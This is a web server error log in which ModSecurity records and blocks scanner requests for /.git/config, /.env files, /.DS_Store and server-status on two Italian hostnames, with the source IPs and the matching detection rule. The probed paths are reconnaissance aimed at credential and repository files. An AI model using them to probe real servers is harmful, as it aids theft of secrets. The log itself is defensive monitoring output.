[Tue Mar 18 23:19:06.599534 2025] [:error] [pid 1862050] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nxWjPtPQFCxkZAroh7HwAAAAk"]
[Tue Mar 18 23:19:06.600098 2025] [:error] [pid 1862050] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nxWjPtPQFCxkZAroh7HwAAAAk"]
[Tue Mar 18 23:19:06.600517 2025] [:error] [pid 1862050] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nxWjPtPQFCxkZAroh7HwAAAAk"]
[Tue Mar 18 23:35:32.596178 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPAAAAAM"]
[Tue Mar 18 23:35:32.596580 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPAAAAAM"]
[Tue Mar 18 23:35:32.596824 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPAAAAAM"]
[Tue Mar 18 23:35:32.781725 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPQAAAAM"]
[Tue Mar 18 23:35:32.782379 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPQAAAAM"]
[Tue Mar 18 23:35:32.782919 2025] [:error] [pid 1854491] [client 170.39.218.246:56146] [client 170.39.218.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z9n1NFz_vQOmg049tXBnPQAAAAM"]
[Tue Mar 18 23:35:48.255506 2025] [:error] [pid 1862048] [client 170.39.218.246:45844] [client 170.39.218.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9n1RE-j7iMvnhflXSRR1wAAAAc"]
[Tue Mar 18 23:35:48.256131 2025] [:error] [pid 1862048] [client 170.39.218.246:45844] [client 170.39.218.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9n1RE-j7iMvnhflXSRR1wAAAAc"]
[Tue Mar 18 23:35:48.256611 2025] [:error] [pid 1862048] [client 170.39.218.246:45844] [client 170.39.218.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9n1RE-j7iMvnhflXSRR1wAAAAc"]
[Wed Mar 19 04:15:03.340584 2025] [:error] [pid 1876134] [client 45.148.10.98:39206] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9o2t8wk2MGssv583BqRoAAAAAU"]
[Wed Mar 19 04:15:03.341035 2025] [:error] [pid 1876134] [client 45.148.10.98:39206] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9o2t8wk2MGssv583BqRoAAAAAU"]
[Wed Mar 19 04:15:03.341289 2025] [:error] [pid 1876134] [client 45.148.10.98:39206] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9o2t8wk2MGssv583BqRoAAAAAU"]
[Wed Mar 19 14:01:03.395988 2025] [:error] [pid 1876134] [client 216.81.248.20:40308] [client 216.81.248.20] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9rAD8wk2MGssv583BqR6AAAAAU"]
[Wed Mar 19 14:01:03.396625 2025] [:error] [pid 1876134] [client 216.81.248.20:40308] [client 216.81.248.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9rAD8wk2MGssv583BqR6AAAAAU"]
[Wed Mar 19 14:01:03.397074 2025] [:error] [pid 1876134] [client 216.81.248.20:40308] [client 216.81.248.20] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9rAD8wk2MGssv583BqR6AAAAAU"]
[Wed Mar 19 19:08:22.194878 2025] [authz_core:error] [pid 1890409] [client 68.183.9.16:34504] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Mar 19 19:08:32.083780 2025] [:error] [pid 1890452] [client 68.183.9.16:34536] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z9sIIBrGrPF6pD_4WM9-gQAAAAg"]
[Wed Mar 19 19:08:32.084258 2025] [:error] [pid 1890452] [client 68.183.9.16:34536] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z9sIIBrGrPF6pD_4WM9-gQAAAAg"]
[Wed Mar 19 19:08:32.084741 2025] [:error] [pid 1890452] [client 68.183.9.16:34536] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z9sIIBrGrPF6pD_4WM9-gQAAAAg"]
[Wed Mar 19 19:08:34.122488 2025] [:error] [pid 1890410] [client 68.183.9.16:42752] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sIIo6BW4_jXLB5GctC5wAAAAU"]
[Wed Mar 19 19:08:34.123150 2025] [:error] [pid 1890410] [client 68.183.9.16:42752] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sIIo6BW4_jXLB5GctC5wAAAAU"]
[Wed Mar 19 19:08:34.123578 2025] [:error] [pid 1890410] [client 68.183.9.16:42752] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sIIo6BW4_jXLB5GctC5wAAAAU"]
[Wed Mar 19 19:08:36.822360 2025] [:error] [pid 1890408] [client 68.183.9.16:42766] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z9sIJJgin_T21WOSVWJFNgAAAAI"]
[Wed Mar 19 19:08:36.823043 2025] [:error] [pid 1890408] [client 68.183.9.16:42766] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z9sIJJgin_T21WOSVWJFNgAAAAI"]
[Wed Mar 19 19:08:36.823573 2025] [:error] [pid 1890408] [client 68.183.9.16:42766] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z9sIJJgin_T21WOSVWJFNgAAAAI"]
[Wed Mar 19 19:20:06.368846 2025] [:error] [pid 1890442] [client 216.81.248.20:40374] [client 216.81.248.20] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9sK1r60oZ3YW0F6RnobcAAAAAQ"]
[Wed Mar 19 19:20:06.369815 2025] [:error] [pid 1890442] [client 216.81.248.20:40374] [client 216.81.248.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9sK1r60oZ3YW0F6RnobcAAAAAQ"]
[Wed Mar 19 19:20:06.370335 2025] [:error] [pid 1890442] [client 216.81.248.20:40374] [client 216.81.248.20] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9sK1r60oZ3YW0F6RnobcAAAAAQ"]
[Wed Mar 19 20:22:28.657167 2025] [:error] [pid 1890407] [client 74.213.236.65:36854] [client 74.213.236.65] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sZdIdat9QTrD9PotHFGQAAAAE"]
[Wed Mar 19 20:22:28.658450 2025] [:error] [pid 1890407] [client 74.213.236.65:36854] [client 74.213.236.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sZdIdat9QTrD9PotHFGQAAAAE"]
[Wed Mar 19 20:22:28.658930 2025] [:error] [pid 1890407] [client 74.213.236.65:36854] [client 74.213.236.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9sZdIdat9QTrD9PotHFGQAAAAE"]
[Thu Mar 20 17:09:03.421965 2025] [:error] [pid 1898087] [client 216.81.248.55:43300] [client 216.81.248.55] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9w9nxYKDgTeWaWy8-n9EQAAAAs"]
[Thu Mar 20 17:09:03.423378 2025] [:error] [pid 1898087] [client 216.81.248.55:43300] [client 216.81.248.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9w9nxYKDgTeWaWy8-n9EQAAAAs"]
[Thu Mar 20 17:09:03.423570 2025] [:error] [pid 1898087] [client 216.81.248.55:43300] [client 216.81.248.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9w9nxYKDgTeWaWy8-n9EQAAAAs"]
[Thu Mar 20 19:47:50.096552 2025] [:error] [pid 1907059] [client 45.148.10.172:47150] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9xi1oOQRco0OleMdMBDDQAAAAg"]
[Thu Mar 20 19:47:50.096824 2025] [:error] [pid 1907059] [client 45.148.10.172:47150] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9xi1oOQRco0OleMdMBDDQAAAAg"]
[Thu Mar 20 19:47:50.097023 2025] [:error] [pid 1907059] [client 45.148.10.172:47150] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z9xi1oOQRco0OleMdMBDDQAAAAg"]
[Fri Mar 21 16:50:13.054922 2025] [:error] [pid 1923863] [client 45.148.10.172:38816] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z92KtZ58vYfjPYl6QWTACwAAAAo"]
